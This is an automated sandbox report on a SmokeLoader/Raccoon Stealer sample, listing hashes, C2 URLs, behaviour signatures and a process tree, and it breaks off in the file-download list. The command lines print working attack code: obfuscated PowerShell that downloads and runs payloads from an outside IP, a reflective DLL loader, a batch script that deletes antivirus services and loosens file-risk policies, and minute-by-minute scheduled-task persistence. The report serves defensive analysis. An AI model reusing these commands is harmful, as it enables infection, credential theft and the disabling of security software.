Analysis
-
max time kernel
151s
-
max time network
136s
-
platform
windows10_x64
-
resource
win10v20210408
-
submitted
11-08-2021 06:46
Static task
static1
Behavioral task
behavioral1
Sample
bfa14859432cc51e9f8a9b632dc38713.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
bfa14859432cc51e9f8a9b632dc38713.exe
Resource
win10v20210408
General
-
Target
bfa14859432cc51e9f8a9b632dc38713.exe
-
Size
302KB
-
MD5
bfa14859432cc51e9f8a9b632dc38713
-
SHA1
b76262d0b04a555f9ddbef1e3f8a99fe8bf50f5f
-
SHA256
940856f93e56ecd69b6833c94a78247b3f8d60348ac9b73928fd338113fbbc9e
-
SHA512
92df1e4440a47ac40a7a32fcd064632b4ca414e85a8b607d53dee0c95980159db198aff55247a73df59914eb0db4828685d5d21a0659ead1674d252bc9ac01d9
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
raccoon
83fbe81dd43f775dd8af3cd619f88f428fbd9a96
-
url4cnc
https://telete.in/opa4kiprivatem
Signatures
-
Raccoon Stealer Payload 2 IoCs
Processes:
resource | yara_rule
behavioral2/memory/492-128-0x00000000048E0000-0x0000000004973000-memory.dmp | family_raccoon
behavioral2/memory/492-129-0x0000000000400000-0x0000000002CB4000-memory.dmp | family_raccoon
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
45 | 996 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
pid | process
1332 | 693A.exe
492 | 6EF8.exe
1548 | Runtimebroker.exe
2644 | 4J0sUZK11d.exe
3632 | sqlcmd.exe
-
Deletes itself 1 IoCs
Processes:
pid | process
2180 | (name not recorded)
-
Drops startup file 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk | Runtimebroker.exe
-
Loads dropped DLL 5 IoCs
Processes:
pid | process
492 | 6EF8.exe
492 | 6EF8.exe
492 | 6EF8.exe
492 | 6EF8.exe
492 | 6EF8.exe
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.2'+'41'+'.19.5'+'2/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" | powershell.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bfa14859432cc51e9f8a9b632dc38713.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bfa14859432cc51e9f8a9b632dc38713.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bfa14859432cc51e9f8a9b632dc38713.exe
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
2436 | schtasks.exe
2216 | schtasks.exe
-
Delays execution with timeout.exe 1 IoCs
Processes:
pid | process
580 | timeout.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
996 | bfa14859432cc51e9f8a9b632dc38713.exe
996 | bfa14859432cc51e9f8a9b632dc38713.exe
2180 | (name not recorded), repeated for the remaining 62 of the 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
2180 | (name not recorded)
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid | process
996 | bfa14859432cc51e9f8a9b632dc38713.exe
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3276 | powershell.exe
Token: SeDebugPrivilege | 996 | powershell.exe
Token: SeDebugPrivilege | 2020 | powershell.exe
Token: SeShutdownPrivilege | 2180 | (name not recorded)
Token: SeCreatePagefilePrivilege | 2180 | (name not recorded)
-
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid | process
2180 | (name not recorded)
-
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
description | pid | process | target process
PID 2180 wrote to memory of 1332 | 2180 | (name not recorded) | 693A.exe
PID 2180 wrote to memory of 492 | 2180 | (name not recorded) | 6EF8.exe
PID 1332 wrote to memory of 1548 | 1332 | 693A.exe | Runtimebroker.exe
PID 1548 wrote to memory of 3276 | 1548 | Runtimebroker.exe | powershell.exe
PID 1548 wrote to memory of 996 | 1548 | Runtimebroker.exe | powershell.exe
PID 996 wrote to memory of 2020 | 996 | powershell.exe | powershell.exe
PID 996 wrote to memory of 2648 | 996 | powershell.exe | cmd.exe
PID 492 wrote to memory of 2644 | 492 | 6EF8.exe | 4J0sUZK11d.exe
PID 492 wrote to memory of 2304 | 492 | 6EF8.exe | cmd.exe
PID 2304 wrote to memory of 580 | 2304 | cmd.exe | timeout.exe
PID 2644 wrote to memory of 2216 | 2644 | 4J0sUZK11d.exe | schtasks.exe
PID 3632 wrote to memory of 2436 | 3632 | sqlcmd.exe | schtasks.exe
Each of the twelve rows above is recorded three times in the report (36 IoCs in total).
Processes
-
C:\Users\Admin\AppData\Local\Temp\bfa14859432cc51e9f8a9b632dc38713.exe (process tree depth 1)
Command line: "C:\Users\Admin\AppData\Local\Temp\bfa14859432cc51e9f8a9b632dc38713.exe"
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\693A.exe (process tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\693A.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe (process tree depth 2)
Command line: "C:\ProgramData\Runtimebroker.exe"
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (process tree depth 3)
Command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.2''+''41''+''.19.5''+''2/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (process tree depth 3)
Command line: powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (process tree depth 4)
Command line: "powershell" Get-MpPreference -verbose
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe (process tree depth 4)
Command line: "C:\Windows\System32\cmd.exe"
Command line content as recorded by the sandbox, reflowed one command per line:
@echo off
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
set "osX=%PROCESSOR_ARCHITECTURE%"
if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
if "%osX%"=="x86" (
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
  Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
) else (
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32
  Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
  Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64
  Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
  Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
)
-
C:\Users\Admin\AppData\Local\Temp\6EF8.exe (process tree depth 1)
Command line: C:\Users\Admin\AppData\Local\Temp\6EF8.exe
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4J0sUZK11d.exe (process tree depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\4J0sUZK11d.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe (process tree depth 3)
Command line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe (process tree depth 2)
Command line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6EF8.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exe (process tree depth 3)
Command line: timeout /T 10 /NOBREAK
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe (process tree depth 1)
Command line: C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe (process tree depth 2)
Command line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\Runtimebroker.exe
MD5
21b0c600acd7a7f957e3387f9a5c5aad
SHA1
297472985636d9bb5154992f4ad1e83bbdc821fe
SHA256
bd098349f7261ffae0cb0de33590d68730c7fd05eeb046ec7f3b4484a2b1cecb
SHA512
3d26fcb6a9aa64ae12ee8fbbe05a16fd5199c4b626e6fce321726aa03a249315f05500378487e847ca28d670326b17f915a8e8fb7f5ed7ed9cb67ce6120f815e
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1
eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256
dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512
977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9c124072f58bbb02dec8580b37ec090c
SHA1
96328890ba89b73a6ff28e3a2b0cc75e8e67d868
SHA256
5b6cff6a25e4e4e8939c8026a0e76f7cd1987c873fc403d5be1c9a2f9252938f
SHA512
9849b70462f454a7ae6a03866fcf73ccb7d325e05ef662d55ee50a7f9d3e976bb46b01cfd1ed33bcb5d0c9f02cf25f31f48481f583a516d2f42c3c474a22f7ca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
11d838827e27b5fe60dce1495951e403
SHA1
d83c25fa6f022888824d457d74a64044bc025902
SHA256
6dc4307022af546971d7216f389772c8986f39995265191b5995561099d59052
SHA512
5ed0c13b1ffd531d2669bf451d3eccf893345bba0af7d989f692261eb4bd7e02b6fc6a4462909a912eb32dd852e49df42154877390182f427fd5a78411eba659
-
C:\Users\Admin\AppData\Local\Temp\4J0sUZK11d.exe
MD5
1770a0e98a4d78983f336eba64e859df
SHA1
54ffcd3aff807860d765f41933a9e92f0bd359ae
SHA256
1b2a01df5ea1d61efe89352a307c4c9c27b9dce72d8a907cdd314c56cd064161
SHA512
b9cefa3c9b0af64e730454bdcc40dc07e0c579e4dae038ba175e3ef0215ccd8f436c07ce6439bc4a091765fd4c2870746137c9bbef938c4bc00ff3264d8e3997
-
C:\Users\Admin\AppData\Local\Temp\693A.exe
MD5
21b0c600acd7a7f957e3387f9a5c5aad
SHA1
297472985636d9bb5154992f4ad1e83bbdc821fe
SHA256
bd098349f7261ffae0cb0de33590d68730c7fd05eeb046ec7f3b4484a2b1cecb
SHA512
3d26fcb6a9aa64ae12ee8fbbe05a16fd5199c4b626e6fce321726aa03a249315f05500378487e847ca28d670326b17f915a8e8fb7f5ed7ed9cb67ce6120f815e
-
C:\Users\Admin\AppData\Local\Temp\6EF8.exe
MD5
fae8647fd16b99bfd4eaefeca4fe894b
SHA1
949ad3aedafa32a6bc5eebfd478282a807a58b5b
SHA256
